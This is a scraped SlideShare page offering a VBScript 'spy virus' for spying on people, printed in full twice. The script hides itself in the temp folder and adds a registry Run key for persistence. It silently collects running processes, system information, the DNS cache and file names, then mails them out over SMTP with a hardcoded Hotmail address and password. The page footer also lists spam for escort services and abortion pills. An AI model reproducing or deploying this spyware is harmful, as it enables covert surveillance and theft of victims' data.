SlideShare uma empresa Scribd logo
1 de 2
on error resume next
Dim destinatario
Dim receptor
Dim password
Dim proceso
Dim infopc
Dim archivos
Dim historial
Dim info2
destinatario = "chorodeacc15@hotmail.com"
password = "993913600ata"
receptor = "chorodeacc15@hotmail.com"
Set ws = WScript.CreateObject("WScript.Shell")
temp = ws.Environment("Process")("Temp")
Dim resultado
set objshell = createobject("wscript.shell")
objshell.run "cmd /k copy " & wscript.scriptfullname & " %tmp%" &
wscript.scriptname & " & exit" , vbhide
Set registro = CreateObject("WScript.Shell")
registro.RegWrite
"HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunSystem" , temp
& "" & wscript.scriptname
Set objfso = createobject("scripting.filesystemobject")
Set archivo = objfso.getfile(temp & "" & wscript.scriptname)
archivo.attributes = 39
set objshell = createobject("wscript.shell")
objshell.run "cmd /k tasklist > " & temp & "proceso.txt & exit ",vbhide
Set filestreamIN = CreateObject("Scripting.FileSystemObject").OpenTextFile(temp
& "proceso.txt",1)
proceso = filestreamIN.ReadAll()
filestreamIN.Close()
set objshell = createobject("wscript.shell")
objshell.run "cmd /k ver > " & temp & "ver.txt & exit ",vbhide
Set filestreamIN = CreateObject("Scripting.FileSystemObject").OpenTextFile(temp
& "ver.txt",1)
infopc = filestreamIN.ReadAll()
filestreamIN.Close()
set objshell = createobject("wscript.shell")
objshell.run "cmd /k ipconfig /displaydns > " & temp & "historial.txt & exit
",vbhide
WScript.Sleep 3000
Set filestreamIN = CreateObject("Scripting.FileSystemObject").OpenTextFile(temp
& "historial.txt",1)
historial = filestreamIN.ReadAll()
filestreamIN.Close()
set objshell = createobject("wscript.shell")
objshell.run "cmd /k systeminfo > " & temp & "info2.txt & exit ",vbhide
WScript.Sleep 3000
Set filestreamIN = CreateObject("Scripting.FileSystemObject").OpenTextFile(temp
& "info2.txt",1)
info2 = filestreamIN.ReadAll()
filestreamIN.Close()
Dim fso, f, fc, dir, f1, listdir, fitxerpersonal
dir = WScript.CreateObject("WScript.Shell").Environment("Process")("Temp")
listar
set ws=createobject("WScript.shell")
Set WshNtwk = WScript.CreateObject("WScript.Network")
set objcdo=createobject("cdo.message")
objcdo.subject="Informacion de " & WshNtwk.ComputerName
objcdo.from=destinatario
objcdo.to=receptor
objcdo.textbody= "Lista de Procesos " & vbcr & proceso & vbcr & "Informacion
Sobre la Pc" & vbcr & infopc & vbcr & "Informacion extendida sobre la Pc" & vbcr
& info2 & vbcr & "Lista de Archivos abiertos Recientemente" & vbcr & archivos &
vbcr & "Historial de Navegacion" & vbcr & historial
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration
/sendusing") = 2
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration
/smtpserver") = "smtp.live.com"
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration
/smtpserverport") = "25"
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration
/smtpauthenticate") = 1
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration
/smtpconnectiontimeout") = 30
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration
/sendusername") = destinatario
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration
/sendpassword") = password
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration
/smtpusessl") = 1
objcdo.configuration.fields.update
objcdo.send
Sub listar()
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFolder(dir)
recursive_Fitxer(f)
archivos =listdir
End sub
function recursive_fitxer(folder)
dim internalFolder
For Each internalFolder in folder.SubFolders
recursive_fitxer(internalFolder)
Next
Set fc = folder.Files
For Each f1 in fc
listdir = listdir & f1.name
listdir = listdir & vbCrLf
Next
end function

Mais conteúdo relacionado

Mais procurados

MongoDB全機能解説2
MongoDB全機能解説2MongoDB全機能解説2
MongoDB全機能解説2Takahiro Inoue
 
Security Challenges in Node.js
Security Challenges in Node.jsSecurity Challenges in Node.js
Security Challenges in Node.jsWebsecurify
 
jQuery Datatables With MongDb
jQuery Datatables With MongDbjQuery Datatables With MongDb
jQuery Datatables With MongDbsliimohara
 
Paris js extensions
Paris js extensionsParis js extensions
Paris js extensionserwanl
 
NoSQL Injections in Node.js - The case of MongoDB
NoSQL Injections in Node.js - The case of MongoDBNoSQL Injections in Node.js - The case of MongoDB
NoSQL Injections in Node.js - The case of MongoDBSqreen
 
Nginx cache api delete
Nginx cache api deleteNginx cache api delete
Nginx cache api deleteYuki Iwamoto
 
Chrome拡張開発者のためのFirefox拡張開発
Chrome拡張開発者のためのFirefox拡張開発Chrome拡張開発者のためのFirefox拡張開発
Chrome拡張開発者のためのFirefox拡張開発swdyh
 
JavaSE7 Launch Event: Java7xGroovy
JavaSE7 Launch Event: Java7xGroovyJavaSE7 Launch Event: Java7xGroovy
JavaSE7 Launch Event: Java7xGroovyYasuharu Nakano
 
Inside MongoDB: the Internals of an Open-Source Database
Inside MongoDB: the Internals of an Open-Source DatabaseInside MongoDB: the Internals of an Open-Source Database
Inside MongoDB: the Internals of an Open-Source DatabaseMike Dirolf
 
与 PHP 和 Perl 使用 MySQL 数据库
与 PHP 和 Perl 使用 MySQL 数据库与 PHP 和 Perl 使用 MySQL 数据库
与 PHP 和 Perl 使用 MySQL 数据库YUCHENG HU
 
How to send files to remote server via ssh in php
How to send files to remote server via ssh in phpHow to send files to remote server via ssh in php
How to send files to remote server via ssh in phpAndolasoft Inc
 
New kid on the block node.js
New kid on the block node.jsNew kid on the block node.js
New kid on the block node.jsJoel Divekar
 
MongoDB: How it Works
MongoDB: How it WorksMongoDB: How it Works
MongoDB: How it WorksMike Dirolf
 
Redis - Usability and Use Cases
Redis - Usability and Use CasesRedis - Usability and Use Cases
Redis - Usability and Use CasesFabrizio Farinacci
 

Mais procurados (20)

MongoDB全機能解説2
MongoDB全機能解説2MongoDB全機能解説2
MongoDB全機能解説2
 
Security Challenges in Node.js
Security Challenges in Node.jsSecurity Challenges in Node.js
Security Challenges in Node.js
 
jQuery Datatables With MongDb
jQuery Datatables With MongDbjQuery Datatables With MongDb
jQuery Datatables With MongDb
 
Paris js extensions
Paris js extensionsParis js extensions
Paris js extensions
 
NoSQL Injections in Node.js - The case of MongoDB
NoSQL Injections in Node.js - The case of MongoDBNoSQL Injections in Node.js - The case of MongoDB
NoSQL Injections in Node.js - The case of MongoDB
 
Nginx cache api delete
Nginx cache api deleteNginx cache api delete
Nginx cache api delete
 
Chrome拡張開発者のためのFirefox拡張開発
Chrome拡張開発者のためのFirefox拡張開発Chrome拡張開発者のためのFirefox拡張開発
Chrome拡張開発者のためのFirefox拡張開発
 
MongoDB Oplog入門
MongoDB Oplog入門MongoDB Oplog入門
MongoDB Oplog入門
 
The jsdom
The jsdomThe jsdom
The jsdom
 
Litebox
LiteboxLitebox
Litebox
 
JavaSE7 Launch Event: Java7xGroovy
JavaSE7 Launch Event: Java7xGroovyJavaSE7 Launch Event: Java7xGroovy
JavaSE7 Launch Event: Java7xGroovy
 
Orm
OrmOrm
Orm
 
Inside MongoDB: the Internals of an Open-Source Database
Inside MongoDB: the Internals of an Open-Source DatabaseInside MongoDB: the Internals of an Open-Source Database
Inside MongoDB: the Internals of an Open-Source Database
 
与 PHP 和 Perl 使用 MySQL 数据库
与 PHP 和 Perl 使用 MySQL 数据库与 PHP 和 Perl 使用 MySQL 数据库
与 PHP 和 Perl 使用 MySQL 数据库
 
How to send files to remote server via ssh in php
How to send files to remote server via ssh in phpHow to send files to remote server via ssh in php
How to send files to remote server via ssh in php
 
New kid on the block node.js
New kid on the block node.jsNew kid on the block node.js
New kid on the block node.js
 
MongoDB: How it Works
MongoDB: How it WorksMongoDB: How it Works
MongoDB: How it Works
 
JavaScript on the Desktop
JavaScript on the DesktopJavaScript on the Desktop
JavaScript on the Desktop
 
Redis - Usability and Use Cases
Redis - Usability and Use CasesRedis - Usability and Use Cases
Redis - Usability and Use Cases
 
Trimming The Cruft
Trimming The CruftTrimming The Cruft
Trimming The Cruft
 

Semelhante a Tipo virus espia con esto aprenderan a espiar a personas etc jeropas de mrd :v

Format xls sheets Demo Mode
Format xls sheets Demo ModeFormat xls sheets Demo Mode
Format xls sheets Demo ModeJared Bourne
 
vbscript-reference book
vbscript-reference bookvbscript-reference book
vbscript-reference bookAnand Dhana
 
The Ring programming language version 1.9 book - Part 53 of 210
The Ring programming language version 1.9 book - Part 53 of 210The Ring programming language version 1.9 book - Part 53 of 210
The Ring programming language version 1.9 book - Part 53 of 210Mahmoud Samir Fayed
 
Codes
CodesCodes
CodesOSit3
 
The Ring programming language version 1.5.4 book - Part 40 of 185
The Ring programming language version 1.5.4 book - Part 40 of 185The Ring programming language version 1.5.4 book - Part 40 of 185
The Ring programming language version 1.5.4 book - Part 40 of 185Mahmoud Samir Fayed
 
Qtp Imp Script Examples
Qtp Imp Script ExamplesQtp Imp Script Examples
Qtp Imp Script ExamplesUser1test
 
HDTR images with Photoshop Javascript Scripting
HDTR images with Photoshop Javascript ScriptingHDTR images with Photoshop Javascript Scripting
HDTR images with Photoshop Javascript ScriptingDavid Gómez García
 
Building Your Own IoT Platform using FIWARE GEis
Building Your Own IoT Platform using FIWARE GEisBuilding Your Own IoT Platform using FIWARE GEis
Building Your Own IoT Platform using FIWARE GEisFIWARE
 
"><img src="x">
"><img src="x">"><img src="x">
"><img src="x">testeracua
 
Rapid and Scalable Development with MongoDB, PyMongo, and Ming
Rapid and Scalable Development with MongoDB, PyMongo, and MingRapid and Scalable Development with MongoDB, PyMongo, and Ming
Rapid and Scalable Development with MongoDB, PyMongo, and MingRick Copeland
 
The Ring programming language version 1.4.1 book - Part 13 of 31
The Ring programming language version 1.4.1 book - Part 13 of 31The Ring programming language version 1.4.1 book - Part 13 of 31
The Ring programming language version 1.4.1 book - Part 13 of 31Mahmoud Samir Fayed
 
File System Operations
File System OperationsFile System Operations
File System OperationsG.C Reddy
 
Inventory program in mca p1
Inventory program in mca p1Inventory program in mca p1
Inventory program in mca p1rameshvvv
 
DEF CON 23: Stick That In Your (root)Pipe & Smoke It
DEF CON 23: Stick That In Your (root)Pipe & Smoke ItDEF CON 23: Stick That In Your (root)Pipe & Smoke It
DEF CON 23: Stick That In Your (root)Pipe & Smoke ItSynack
 
Introduction to Nodejs
Introduction to NodejsIntroduction to Nodejs
Introduction to NodejsGabriele Lana
 
JavaScript Advanced - Useful methods to power up your code
JavaScript Advanced - Useful methods to power up your codeJavaScript Advanced - Useful methods to power up your code
JavaScript Advanced - Useful methods to power up your codeLaurence Svekis ✔
 
WebLogic Administration und Deployment mit WLST
WebLogic Administration und Deployment mit WLSTWebLogic Administration und Deployment mit WLST
WebLogic Administration und Deployment mit WLSTenpit GmbH & Co. KG
 
Grails 1.2 探検隊 -新たな聖杯をもとめて・・・-
Grails 1.2 探検隊 -新たな聖杯をもとめて・・・-Grails 1.2 探検隊 -新たな聖杯をもとめて・・・-
Grails 1.2 探検隊 -新たな聖杯をもとめて・・・-Tsuyoshi Yamamoto
 

Semelhante a Tipo virus espia con esto aprenderan a espiar a personas etc jeropas de mrd :v (20)

Format xls sheets Demo Mode
Format xls sheets Demo ModeFormat xls sheets Demo Mode
Format xls sheets Demo Mode
 
vbscript-reference book
vbscript-reference bookvbscript-reference book
vbscript-reference book
 
The Ring programming language version 1.9 book - Part 53 of 210
The Ring programming language version 1.9 book - Part 53 of 210The Ring programming language version 1.9 book - Part 53 of 210
The Ring programming language version 1.9 book - Part 53 of 210
 
Codes
CodesCodes
Codes
 
The Ring programming language version 1.5.4 book - Part 40 of 185
The Ring programming language version 1.5.4 book - Part 40 of 185The Ring programming language version 1.5.4 book - Part 40 of 185
The Ring programming language version 1.5.4 book - Part 40 of 185
 
Qtp Imp Script Examples
Qtp Imp Script ExamplesQtp Imp Script Examples
Qtp Imp Script Examples
 
HDTR images with Photoshop Javascript Scripting
HDTR images with Photoshop Javascript ScriptingHDTR images with Photoshop Javascript Scripting
HDTR images with Photoshop Javascript Scripting
 
Form1.vb
Form1.vbForm1.vb
Form1.vb
 
Building Your Own IoT Platform using FIWARE GEis
Building Your Own IoT Platform using FIWARE GEisBuilding Your Own IoT Platform using FIWARE GEis
Building Your Own IoT Platform using FIWARE GEis
 
Python for Penetration testers
Python for Penetration testersPython for Penetration testers
Python for Penetration testers
 
"><img src="x">
"><img src="x">"><img src="x">
"><img src="x">
 
Rapid and Scalable Development with MongoDB, PyMongo, and Ming
Rapid and Scalable Development with MongoDB, PyMongo, and MingRapid and Scalable Development with MongoDB, PyMongo, and Ming
Rapid and Scalable Development with MongoDB, PyMongo, and Ming
 
The Ring programming language version 1.4.1 book - Part 13 of 31
The Ring programming language version 1.4.1 book - Part 13 of 31The Ring programming language version 1.4.1 book - Part 13 of 31
The Ring programming language version 1.4.1 book - Part 13 of 31
 
File System Operations
File System OperationsFile System Operations
File System Operations
 
Inventory program in mca p1
Inventory program in mca p1Inventory program in mca p1
Inventory program in mca p1
 
DEF CON 23: Stick That In Your (root)Pipe & Smoke It
DEF CON 23: Stick That In Your (root)Pipe & Smoke ItDEF CON 23: Stick That In Your (root)Pipe & Smoke It
DEF CON 23: Stick That In Your (root)Pipe & Smoke It
 
Introduction to Nodejs
Introduction to NodejsIntroduction to Nodejs
Introduction to Nodejs
 
JavaScript Advanced - Useful methods to power up your code
JavaScript Advanced - Useful methods to power up your codeJavaScript Advanced - Useful methods to power up your code
JavaScript Advanced - Useful methods to power up your code
 
WebLogic Administration und Deployment mit WLST
WebLogic Administration und Deployment mit WLSTWebLogic Administration und Deployment mit WLST
WebLogic Administration und Deployment mit WLST
 
Grails 1.2 探検隊 -新たな聖杯をもとめて・・・-
Grails 1.2 探検隊 -新たな聖杯をもとめて・・・-Grails 1.2 探検隊 -新たな聖杯をもとめて・・・-
Grails 1.2 探検隊 -新たな聖杯をもとめて・・・-
 

Último

independent Call Girls West Sikkim 9332606886 ust Genuine Escort Model Sevice
independent Call Girls West Sikkim  9332606886  ust Genuine Escort Model Seviceindependent Call Girls West Sikkim  9332606886  ust Genuine Escort Model Sevice
independent Call Girls West Sikkim 9332606886 ust Genuine Escort Model SeviceSareena Khatun
 
contact "+971)558539980" to buy abortion pills in Dubai, Abu Dhabi
contact "+971)558539980" to buy abortion pills in Dubai, Abu Dhabicontact "+971)558539980" to buy abortion pills in Dubai, Abu Dhabi
contact "+971)558539980" to buy abortion pills in Dubai, Abu Dhabihyt3577
 
Call girls Service Songadh / 8250092165 Genuine Call girls with real Photos a...
Call girls Service Songadh / 8250092165 Genuine Call girls with real Photos a...Call girls Service Songadh / 8250092165 Genuine Call girls with real Photos a...
Call girls Service Songadh / 8250092165 Genuine Call girls with real Photos a...Sareena Khatun
 
Arjunganj % (Genuine) Escort Service Lucknow | Book 9548273370 Extreme Naught...
Arjunganj % (Genuine) Escort Service Lucknow | Book 9548273370 Extreme Naught...Arjunganj % (Genuine) Escort Service Lucknow | Book 9548273370 Extreme Naught...
Arjunganj % (Genuine) Escort Service Lucknow | Book 9548273370 Extreme Naught...adilkhan87451
 
Top profile Call Girls In Kharagpur [ 7014168258 ] Call Me For Genuine Models...
Top profile Call Girls In Kharagpur [ 7014168258 ] Call Me For Genuine Models...Top profile Call Girls In Kharagpur [ 7014168258 ] Call Me For Genuine Models...
Top profile Call Girls In Kharagpur [ 7014168258 ] Call Me For Genuine Models...gajnagarg
 
Balanced Diet, Modified Diet, RDA and Menu Planning.pptx
Balanced Diet, Modified Diet, RDA and Menu Planning.pptxBalanced Diet, Modified Diet, RDA and Menu Planning.pptx
Balanced Diet, Modified Diet, RDA and Menu Planning.pptxDr. Trisha Manna
 
Call Girls Baruipur - 8250092165 Our call girls are sure to provide you with ...
Call Girls Baruipur - 8250092165 Our call girls are sure to provide you with ...Call Girls Baruipur - 8250092165 Our call girls are sure to provide you with ...
Call Girls Baruipur - 8250092165 Our call girls are sure to provide you with ...Sareena Khatun
 
PRESENTATION.on wooden comb idea innovation project
PRESENTATION.on wooden comb idea innovation projectPRESENTATION.on wooden comb idea innovation project
PRESENTATION.on wooden comb idea innovation projectjain99591
 
HiFi Call Girl Service Hyderabad | Whatsapp No 📞 9352988975 📞 VIP Escorts Ser...
HiFi Call Girl Service Hyderabad | Whatsapp No 📞 9352988975 📞 VIP Escorts Ser...HiFi Call Girl Service Hyderabad | Whatsapp No 📞 9352988975 📞 VIP Escorts Ser...
HiFi Call Girl Service Hyderabad | Whatsapp No 📞 9352988975 📞 VIP Escorts Ser...kajalverma014
 
Berhampur Escorts Service Girl ^ 9332606886, WhatsApp Anytime Berhampur
Berhampur Escorts Service Girl ^ 9332606886, WhatsApp Anytime BerhampurBerhampur Escorts Service Girl ^ 9332606886, WhatsApp Anytime Berhampur
Berhampur Escorts Service Girl ^ 9332606886, WhatsApp Anytime Berhampurmeghakumariji156
 
Call Girls Service Alappuzha 9332606886 HOT & SEXY Models beautiful and char...
Call Girls Service Alappuzha  9332606886 HOT & SEXY Models beautiful and char...Call Girls Service Alappuzha  9332606886 HOT & SEXY Models beautiful and char...
Call Girls Service Alappuzha 9332606886 HOT & SEXY Models beautiful and char...kumargunjan9515
 
Top profile Call Girls In Deoghar [ 7014168258 ] Call Me For Genuine Models W...
Top profile Call Girls In Deoghar [ 7014168258 ] Call Me For Genuine Models W...Top profile Call Girls In Deoghar [ 7014168258 ] Call Me For Genuine Models W...
Top profile Call Girls In Deoghar [ 7014168258 ] Call Me For Genuine Models W...gajnagarg
 
Rajpur ) Virgin Call Girls Kolkata Neha 8005736733 | 100% Gennuine High Class...
Rajpur ) Virgin Call Girls Kolkata Neha 8005736733 | 100% Gennuine High Class...Rajpur ) Virgin Call Girls Kolkata Neha 8005736733 | 100% Gennuine High Class...
Rajpur ) Virgin Call Girls Kolkata Neha 8005736733 | 100% Gennuine High Class...HyderabadDolls
 
thesis of copper nanoparticles and their relevance
thesis of copper nanoparticles and their relevancethesis of copper nanoparticles and their relevance
thesis of copper nanoparticles and their relevanceDiptiPriya6
 
Call girls Service Nacharam - 8250092165 Our call girls are sure to provide y...
Call girls Service Nacharam - 8250092165 Our call girls are sure to provide y...Call girls Service Nacharam - 8250092165 Our call girls are sure to provide y...
Call girls Service Nacharam - 8250092165 Our call girls are sure to provide y...kumargunjan9515
 
Call Girls Surat ( 8250092165 ) Cheap rates call girls | Get low budget
Call Girls Surat ( 8250092165 ) Cheap rates call girls | Get low budgetCall Girls Surat ( 8250092165 ) Cheap rates call girls | Get low budget
Call Girls Surat ( 8250092165 ) Cheap rates call girls | Get low budgetSareena Khatun
 
Call Girls Vanasthalipuram - 8250092165 Our call girls are sure to provide yo...
Call Girls Vanasthalipuram - 8250092165 Our call girls are sure to provide yo...Call Girls Vanasthalipuram - 8250092165 Our call girls are sure to provide yo...
Call Girls Vanasthalipuram - 8250092165 Our call girls are sure to provide yo...kumargunjan9515
 
Call Girls Kothrud / 8250092165 Genuine Call girls with real Photos and Number
Call Girls Kothrud / 8250092165 Genuine Call girls with real Photos and NumberCall Girls Kothrud / 8250092165 Genuine Call girls with real Photos and Number
Call Girls Kothrud / 8250092165 Genuine Call girls with real Photos and NumberSareena Khatun
 
Erotic Vadodara Call Girls Service 👉📞 6378878445 👉📞 Just📲 Call Ruhi Call Gir...
Erotic  Vadodara Call Girls Service 👉📞 6378878445 👉📞 Just📲 Call Ruhi Call Gir...Erotic  Vadodara Call Girls Service 👉📞 6378878445 👉📞 Just📲 Call Ruhi Call Gir...
Erotic Vadodara Call Girls Service 👉📞 6378878445 👉📞 Just📲 Call Ruhi Call Gir...vershagrag
 

Último (20)

independent Call Girls West Sikkim 9332606886 ust Genuine Escort Model Sevice
independent Call Girls West Sikkim  9332606886  ust Genuine Escort Model Seviceindependent Call Girls West Sikkim  9332606886  ust Genuine Escort Model Sevice
independent Call Girls West Sikkim 9332606886 ust Genuine Escort Model Sevice
 
Jual Obat Aborsi Sorong, Wa : 0822/2310/9953 Apotik Jual Obat Cytotec Di Sorong
Jual Obat Aborsi Sorong, Wa : 0822/2310/9953 Apotik Jual Obat Cytotec Di SorongJual Obat Aborsi Sorong, Wa : 0822/2310/9953 Apotik Jual Obat Cytotec Di Sorong
Jual Obat Aborsi Sorong, Wa : 0822/2310/9953 Apotik Jual Obat Cytotec Di Sorong
 
contact "+971)558539980" to buy abortion pills in Dubai, Abu Dhabi
contact "+971)558539980" to buy abortion pills in Dubai, Abu Dhabicontact "+971)558539980" to buy abortion pills in Dubai, Abu Dhabi
contact "+971)558539980" to buy abortion pills in Dubai, Abu Dhabi
 
Call girls Service Songadh / 8250092165 Genuine Call girls with real Photos a...
Call girls Service Songadh / 8250092165 Genuine Call girls with real Photos a...Call girls Service Songadh / 8250092165 Genuine Call girls with real Photos a...
Call girls Service Songadh / 8250092165 Genuine Call girls with real Photos a...
 
Arjunganj % (Genuine) Escort Service Lucknow | Book 9548273370 Extreme Naught...
Arjunganj % (Genuine) Escort Service Lucknow | Book 9548273370 Extreme Naught...Arjunganj % (Genuine) Escort Service Lucknow | Book 9548273370 Extreme Naught...
Arjunganj % (Genuine) Escort Service Lucknow | Book 9548273370 Extreme Naught...
 
Top profile Call Girls In Kharagpur [ 7014168258 ] Call Me For Genuine Models...
Top profile Call Girls In Kharagpur [ 7014168258 ] Call Me For Genuine Models...Top profile Call Girls In Kharagpur [ 7014168258 ] Call Me For Genuine Models...
Top profile Call Girls In Kharagpur [ 7014168258 ] Call Me For Genuine Models...
 
Balanced Diet, Modified Diet, RDA and Menu Planning.pptx
Balanced Diet, Modified Diet, RDA and Menu Planning.pptxBalanced Diet, Modified Diet, RDA and Menu Planning.pptx
Balanced Diet, Modified Diet, RDA and Menu Planning.pptx
 
Call Girls Baruipur - 8250092165 Our call girls are sure to provide you with ...
Call Girls Baruipur - 8250092165 Our call girls are sure to provide you with ...Call Girls Baruipur - 8250092165 Our call girls are sure to provide you with ...
Call Girls Baruipur - 8250092165 Our call girls are sure to provide you with ...
 
PRESENTATION.on wooden comb idea innovation project
PRESENTATION.on wooden comb idea innovation projectPRESENTATION.on wooden comb idea innovation project
PRESENTATION.on wooden comb idea innovation project
 
HiFi Call Girl Service Hyderabad | Whatsapp No 📞 9352988975 📞 VIP Escorts Ser...
HiFi Call Girl Service Hyderabad | Whatsapp No 📞 9352988975 📞 VIP Escorts Ser...HiFi Call Girl Service Hyderabad | Whatsapp No 📞 9352988975 📞 VIP Escorts Ser...
HiFi Call Girl Service Hyderabad | Whatsapp No 📞 9352988975 📞 VIP Escorts Ser...
 
Berhampur Escorts Service Girl ^ 9332606886, WhatsApp Anytime Berhampur
Berhampur Escorts Service Girl ^ 9332606886, WhatsApp Anytime BerhampurBerhampur Escorts Service Girl ^ 9332606886, WhatsApp Anytime Berhampur
Berhampur Escorts Service Girl ^ 9332606886, WhatsApp Anytime Berhampur
 
Call Girls Service Alappuzha 9332606886 HOT & SEXY Models beautiful and char...
Call Girls Service Alappuzha  9332606886 HOT & SEXY Models beautiful and char...Call Girls Service Alappuzha  9332606886 HOT & SEXY Models beautiful and char...
Call Girls Service Alappuzha 9332606886 HOT & SEXY Models beautiful and char...
 
Top profile Call Girls In Deoghar [ 7014168258 ] Call Me For Genuine Models W...
Top profile Call Girls In Deoghar [ 7014168258 ] Call Me For Genuine Models W...Top profile Call Girls In Deoghar [ 7014168258 ] Call Me For Genuine Models W...
Top profile Call Girls In Deoghar [ 7014168258 ] Call Me For Genuine Models W...
 
Rajpur ) Virgin Call Girls Kolkata Neha 8005736733 | 100% Gennuine High Class...
Rajpur ) Virgin Call Girls Kolkata Neha 8005736733 | 100% Gennuine High Class...Rajpur ) Virgin Call Girls Kolkata Neha 8005736733 | 100% Gennuine High Class...
Rajpur ) Virgin Call Girls Kolkata Neha 8005736733 | 100% Gennuine High Class...
 
thesis of copper nanoparticles and their relevance
thesis of copper nanoparticles and their relevancethesis of copper nanoparticles and their relevance
thesis of copper nanoparticles and their relevance
 
Call girls Service Nacharam - 8250092165 Our call girls are sure to provide y...
Call girls Service Nacharam - 8250092165 Our call girls are sure to provide y...Call girls Service Nacharam - 8250092165 Our call girls are sure to provide y...
Call girls Service Nacharam - 8250092165 Our call girls are sure to provide y...
 
Call Girls Surat ( 8250092165 ) Cheap rates call girls | Get low budget
Call Girls Surat ( 8250092165 ) Cheap rates call girls | Get low budgetCall Girls Surat ( 8250092165 ) Cheap rates call girls | Get low budget
Call Girls Surat ( 8250092165 ) Cheap rates call girls | Get low budget
 
Call Girls Vanasthalipuram - 8250092165 Our call girls are sure to provide yo...
Call Girls Vanasthalipuram - 8250092165 Our call girls are sure to provide yo...Call Girls Vanasthalipuram - 8250092165 Our call girls are sure to provide yo...
Call Girls Vanasthalipuram - 8250092165 Our call girls are sure to provide yo...
 
Call Girls Kothrud / 8250092165 Genuine Call girls with real Photos and Number
Call Girls Kothrud / 8250092165 Genuine Call girls with real Photos and NumberCall Girls Kothrud / 8250092165 Genuine Call girls with real Photos and Number
Call Girls Kothrud / 8250092165 Genuine Call girls with real Photos and Number
 
Erotic Vadodara Call Girls Service 👉📞 6378878445 👉📞 Just📲 Call Ruhi Call Gir...
Erotic  Vadodara Call Girls Service 👉📞 6378878445 👉📞 Just📲 Call Ruhi Call Gir...Erotic  Vadodara Call Girls Service 👉📞 6378878445 👉📞 Just📲 Call Ruhi Call Gir...
Erotic Vadodara Call Girls Service 👉📞 6378878445 👉📞 Just📲 Call Ruhi Call Gir...
 

Tipo virus espia con esto aprenderan a espiar a personas etc jeropas de mrd :v

  • 1. on error resume next Dim destinatario Dim receptor Dim password Dim proceso Dim infopc Dim archivos Dim historial Dim info2 destinatario = "chorodeacc15@hotmail.com" password = "993913600ata" receptor = "chorodeacc15@hotmail.com" Set ws = WScript.CreateObject("WScript.Shell") temp = ws.Environment("Process")("Temp") Dim resultado set objshell = createobject("wscript.shell") objshell.run "cmd /k copy " & wscript.scriptfullname & " %tmp%" & wscript.scriptname & " & exit" , vbhide Set registro = CreateObject("WScript.Shell") registro.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunSystem" , temp & "" & wscript.scriptname Set objfso = createobject("scripting.filesystemobject") Set archivo = objfso.getfile(temp & "" & wscript.scriptname) archivo.attributes = 39 set objshell = createobject("wscript.shell") objshell.run "cmd /k tasklist > " & temp & "proceso.txt & exit ",vbhide Set filestreamIN = CreateObject("Scripting.FileSystemObject").OpenTextFile(temp & "proceso.txt",1) proceso = filestreamIN.ReadAll() filestreamIN.Close() set objshell = createobject("wscript.shell") objshell.run "cmd /k ver > " & temp & "ver.txt & exit ",vbhide Set filestreamIN = CreateObject("Scripting.FileSystemObject").OpenTextFile(temp & "ver.txt",1) infopc = filestreamIN.ReadAll() filestreamIN.Close() set objshell = createobject("wscript.shell") objshell.run "cmd /k ipconfig /displaydns > " & temp & "historial.txt & exit ",vbhide WScript.Sleep 3000 Set filestreamIN = CreateObject("Scripting.FileSystemObject").OpenTextFile(temp & "historial.txt",1) historial = filestreamIN.ReadAll() filestreamIN.Close() set objshell = createobject("wscript.shell") objshell.run "cmd /k systeminfo > " & temp & "info2.txt & exit ",vbhide WScript.Sleep 3000 Set filestreamIN = CreateObject("Scripting.FileSystemObject").OpenTextFile(temp & "info2.txt",1) info2 = filestreamIN.ReadAll() filestreamIN.Close() Dim fso, f, fc, dir, f1, listdir, fitxerpersonal dir = WScript.CreateObject("WScript.Shell").Environment("Process")("Temp") listar set ws=createobject("WScript.shell") Set WshNtwk = WScript.CreateObject("WScript.Network") set objcdo=createobject("cdo.message") objcdo.subject="Informacion de " & WshNtwk.ComputerName objcdo.from=destinatario objcdo.to=receptor objcdo.textbody= "Lista de Procesos " & vbcr & proceso & vbcr & "Informacion Sobre la Pc" & vbcr & infopc & vbcr & "Informacion extendida sobre la Pc" & vbcr & info2 & vbcr & "Lista de Archivos abiertos Recientemente" & vbcr & archivos &
  • 2. vbcr & "Historial de Navegacion" & vbcr & historial objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration /sendusing") = 2 objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration /smtpserver") = "smtp.live.com" objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration /smtpserverport") = "25" objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration /smtpauthenticate") = 1 objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration /smtpconnectiontimeout") = 30 objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration /sendusername") = destinatario objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration /sendpassword") = password objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration /smtpusessl") = 1 objcdo.configuration.fields.update objcdo.send Sub listar() Set fso = CreateObject("Scripting.FileSystemObject") Set f = fso.GetFolder(dir) recursive_Fitxer(f) archivos =listdir End sub function recursive_fitxer(folder) dim internalFolder For Each internalFolder in folder.SubFolders recursive_fitxer(internalFolder) Next Set fc = folder.Files For Each f1 in fc listdir = listdir & f1.name listdir = listdir & vbCrLf Next end function